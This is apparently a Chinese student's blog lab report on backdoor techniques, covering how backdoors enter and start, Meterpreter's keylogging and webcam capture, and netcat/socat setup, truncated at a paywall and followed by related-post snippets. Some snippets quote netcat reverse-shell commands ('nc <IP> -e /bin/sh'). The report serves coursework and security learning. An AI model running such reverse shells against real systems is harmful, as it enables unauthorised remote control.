Exp2 后门原理与实践 20204308李文艳

已于 2023-03-23 20:58:36 修改
阅读量633 收藏 2
点赞数 1
文章标签: linux 网络 服务器
于 2023-03-23 20:54:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_61155000/article/details/129731597
版权

Exp2 后门原理与实践 20204308李文艳

1. 基础问题

1.1 例举你能想到的一个后门进入到你系统中的可能方式?

  • 插入不明来源的U盘
  • 安装网上一些不正规的破解软件
  • 在一些非正规的网站下载资源
  • 在钓鱼网站上点击不安全的链接
  • 陌生人发来的邮件中,不明的文件或者链接
  • 打开文档宏,执行的代码中注入后门

1.2 例举你知道的后门如何启动起来(win及linux)的方式?

  • Win:任务计划程序,设置开机自启动,安装伪装成服务,和其他文件捆绑,利用powershell。
  • Linux:通过cron指令制定任务来启动程序、各种脚本,和其他文件捆绑。

1.3 Meterpreter有哪些给你印象深刻的功能?

让我印象最深的是窃听窃照,甚至是键盘敲击的记录。
这些在此之前通过阅读斯诺登《永久记录》中,描述了美国能够监听民众摄像头、在键盘上敲击的字母等场景,当时只是感到很震惊和不可思议。
如今自己通过实验,利用Meterpreter自己就可以将这些操作实践成功,这让我对这些不再震惊与无知,并明白实现这样一件事情对于黑客来说是轻而易举的。

1.4 如何发现自己有系统有没有被安装后门?

  • 检查是否有不常用端口开放;
  • 检查是否有系统文件被修改;
  • 检查是否有可疑程序被执行;
  • 观察系统运行速度和内存有没有明显变化;
  • 观察注册表等。

2. 实验总结与体会

2.1 细节决定成败

在做实验过程中出现了许多小问题,在之后的问题排除过程中可以发现近80%的问题是由于小细节,比如单词拼写错误,缺少空格等,这些问题只要再细心一些就可以避免。

2.2 理解原理很重要

理解实验背后的原理,才能够在出现问题时更好的去寻找问题的原因。这次实验在何时使用何方的IP地址这一问题,就考验了我们对实验的理解。反连接,也就是靶机在“不知情”的情况下连接了攻击机,而攻击机需要实时地监听靶机。

2.3 提升网络安全意识

通过这样比较基础的后门实践,让我再次产生了一种危机感,斯诺登曝光的棱镜门事件美国监控全球,在实验前我只是感到不可思议和震惊,通过这次事件了解了能够实现其中监控的一个小原理,这让我感到自己又懂了些小知识 (半桶水都没有) 。 同时通过后门原理的学习,让我更加注重科学安全上网,尽量不落入一些后门、木马等全套,防范意识得到了一定程度的提高。

2.4 学会利用好的工具

通过网络攻防这么课程,开启了我的第一篇小博客。课堂上和看见其他课题负责人的实验报告之后,我决定去用博客来写实验报告。在这个过程中,我自主去了解其格式,markdown 语法,下载markdown 编译器(Typora)。这篇实验报告下来确实感觉markdown语言去做笔记很方便,很开心开启了我学习生涯的不一样的做笔记形式~

Live and learn

3. 实践过程记录

3.0 环境准备

为了方便之后实验中后门程序的运行,提前关闭Windows主机上的杀毒软件和防火墙。

3.0.1 获取IP地址

因为本次实验需要演示两主机间互相连接、反弹连接、注入后门等操作,因此需要先查询主机ip地址。

Windows:打开cmd窗口,输入ipconfig
查询到本机ip地址为172.30.7.176

在这里插入图片描述

Linux:打开命令行窗口,输入ifconfig
查询到虚拟机IP地址为192.168.191.128

在这里插入图片描述

3.0.2 ncat、socat、Meterpreter基础知识

  • ncat

    ncat即Netcat。Netcat用于从TCP/UDP连接中读取或发送网络数据。ncat可用来做端口扫描、端口转发、连接远程系统等。
    参数解释:
    -l:监听端口,监听入站信息
    -p:后跟本地端口号
    -v:显示端口的信息
    -vv:显示端口更详细的信息

  • socat

    socat可以看做是 Netcat 的加强版。Socat的主要特点就是在两个数据流之间建立双向通道,且支持众多协议和链接方式,如IP,TCP,UDP,IPv6,pipe,exec,system,open,proxy,openssl,socket等。
    功能​:端口转发​、​端口映射​、​端口监听、​tcp/udp连接​、​文件传送​、​nat映射​、使用openssl加密传输​

  • Meterpreter

    Meterpreter号称“黑客瑞士军刀”,首先他有五大模块功能:渗透攻击(Exploit)、攻击载荷(Payload)、Shellcode、模块(Module)、监听器(Listener),功能强大

3.1 使用netcat获取主机操作Shell,cron启动

3.1.1 Windows获取Linux Shell

本实验使用的端口号均为本人学号:4308

  • Windows用命令 ncat.exe -l -p 4308 监听4308端口,等待其他机器连接该端口。
最低0.47元/天 解锁文章
清欢_yann
关注
20194311姜晨昊Exp2-后门原理实践
weixin_51927594的博客
03-28 1449
20194311姜晨昊Exp2-后门原理实践 实验基础 本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。 基础知识 后门的概念 后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。 常用后门工具 NC和Netcat 底层工具,进行基本的
网络对抗技术-Exp2-后门原理实践 20181314
weixin_46014245的博客
03-15 478
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
2018-2019 Exp2 后门原理实践
weixin_34087301的博客
03-20 184
2018-2019 Exp2 后门原理实践 目录 一、实验内容说明及基础问题回答 二、工具准备 查看WindowsIP和LinuxIP Windows获得Linuxshell Linux 获得Windows shell 使用nc传输数据 三、实验过程 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF mete...
Exp2后门原理实践
03-29 247
一、简单后门 1、ncat、socat的基础操作 工具介绍: netcat(nc、ncat)是一个底层工具,进行基本的TCP UDP数据收发。常被其他工具结合使用,起到后门的作用。 socat:类似于Netcat的加强版。 以上两个工具均可以在老师课件主页的附件中下载++https://gitee.com/wildlinux/NetSec/attach_files++ Meterpre...
Exp2 后门原理实践 20164311
weixin_30604651的博客
03-23 226
Exp2 后门原理实践 20164311 实验一:使用netcat获取主机操作Shell,cron启动 1.Windows获得Linux Shell (1)打开本机win10的cmd.exe,使用命令ipconfig查看win10的IP地址。 (2)并用命令ncat.exe -l -p 4311监听本机的4311端口...
Exp2 后门原理实践 20164309
a569847381的博客
03-22 450
准备工作: 使用 ipconfig 查看win7虚拟机IP地址为:192.168.236.130 使用 ipconfig 查看linux虚拟机IP地址为:192.168.236.131 实验内容 一、使用nc或netcat远程获取shell (1)win获得Linux shell 1.windows打开监听 进入文件夹 cd netcat ...
Exp2 后门原理实践 20164320 王浩
weixin_34080571的博客
03-24 325
一、实践基本内容 1.实践目标 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝...
Exp2-后门原理实践
showmaker999的博客
04-18 574
Socat 的主要特点就是在两个数据流之间建立双向通道,且支持众多协议和链接方式,如IP,TCP,UDP,IPv6,pipe,exec,system,open,proxy,openssl,socket等。这个问题可能不是因为MSF而产生的,实践五中,在运行MSF后我发现我的pwn源文件也无权限运行了,所以我怀疑可能是MSF,也可能是下载pwn文件时导致,最终按照网上的资料(后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。
Exp2 后门原理实践 20154320 李超
weixin_34023863的博客
03-30 201
目录- 基础问题回答- 基础知识- 实验过程- 实验心得体会 基础知识问答1. 例举你能想到的一个后门进入到你系统中的可能方式?从不安全的网站上下载的程序可能存在后门2. 例举你知道的后门如何启动起来(win及linux)的方式? 操作系统可能自动启动,如实验中的cron服务和任务计划。也可以通过打开后门程序手动启动。3. Meterpreter有哪些给你映像深刻的功能? ...
20155327Exp2 后门原理实践
weixin_30597269的博客
04-03 170
20155327Exp2 后门原理实践 一、实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 任务四:使用MSF meterpreter(或其...
20164301 Exp2 后门原理实践
weixin_30553065的博客
03-23 192
Exp2 后门原理实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内...
20155325 Exp2 后门原理实践
azxkjsh204704390的博客
04-03 194
基础问答 例举你能想到的一个后门进入到你系统中的可能方式? 乱点链接 学电脑小白不正确配置电脑 下载非官网软件 例举你知道的后门如何启动起来(win及linux)的方式? 软件:ncat socat 修改文件:crontab 其他方式(比如木马)联合,被其他程序启动 Meterpreter有哪些给你映像深刻的功能? 截屏 录音 录像 感觉毫无隐私可言了 如何发现自己有系统有没有被...
20155223 Exp2 后门原理实践
bali9195的博客
03-27 236
20155223 Exp2 后门原理实践 实验预热 一、windows获取Linux shell Windows:使用 ipconfig 命令查看当前机器IP地址。 进入ncat所在文件地址,输入命令:ncat.exe -l -p 5223。 Linux:在命令行终端输入命令:nc windows主机的IP地址 5223 -e /bin/sh。-e反向连接Windows。 一个回...
Exp2 后门原理实践 毛瀚逸 20164318
03-20 282
Exp2 后门原理实践 20164318 毛瀚逸 一、实验内容 基础问题回答: 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:下载奇怪的文件并运行,通过操作系统的漏洞来获取电脑的高级权限。 2.例举你知道的后门如何启动起来(win及linux)的方式? 答:设置定时运行,在设定的时间自动启动。 3.Meterpreter有...
20164310Exp2后门原理实践
weixin_34272308的博客
03-22 173
一、基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式 答:在莫名其妙的网站下载某些莫名奇妙的播放器。 2.例举你知道的后门如何启动起来(win及linux)的方式? 答:对于windows是双击后门软件执行。对于linux,通过cron指令。 3.Meterpreter有哪些给你映像深刻的功能? 答:截屏功能,录音功能,调用摄像头的功能。 4.如何发现自己有系统有没有...
Linux软硬链接和动静态库(20)
tan180°的博客
04-25 1098
我有款非常喜欢玩的游戏,叫做《饥荒》,现在我下载了这一款游戏,但我不会跑到游戏所在目录中双击 .exe 打开游戏,大多数人都会通过桌面的快捷方式直接打开文件,而这个快捷方式实际就是对 .exe 的 软链接 文件;当你在游戏中加载地图、道具等资源时,这些数据是存在 .exe 文件中的吗?答案是当然不是,这些资源文件都以 库 的方式 .exe 位于同一目录中,通常为动态库,在 Windows 中后缀为 dll,那么这些神奇的辅助文件是如何产生的?其本质又是如何?本篇将带你一起揭晓。
Linux 服务管理两种方式service和systemctl
最新发布
lza20001103的博客
04-29 667
Linux 服务管理两种方式service和systemctl
autodl(linux)环境下载git-lfs等工具及使用
zjjaibc的博客
04-26 526
【代码】autodl(linux)环境下载git-lfs等工具。
io_uring概述:现代 Linux 异步 IO 的新范式
2401_84703565的博客
04-26 753
io_uring 是由 Jens Axboe 主导开发的异步 I/O 框架,它设计的核心是:用户态内核共享两个环形队列(SQ & CQ)来提交和获取 I/O 请求,从而避免频繁的系统调用,提高性能。其工作机制如下:SQ(Submission Queue):用户将 I/O 请求写入 SQ(实际上是 struct io_uring_sqe)。CQ(Completion Queue):内核完成请求后,将结果写入 CQ(struct io_uring_cqe)。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值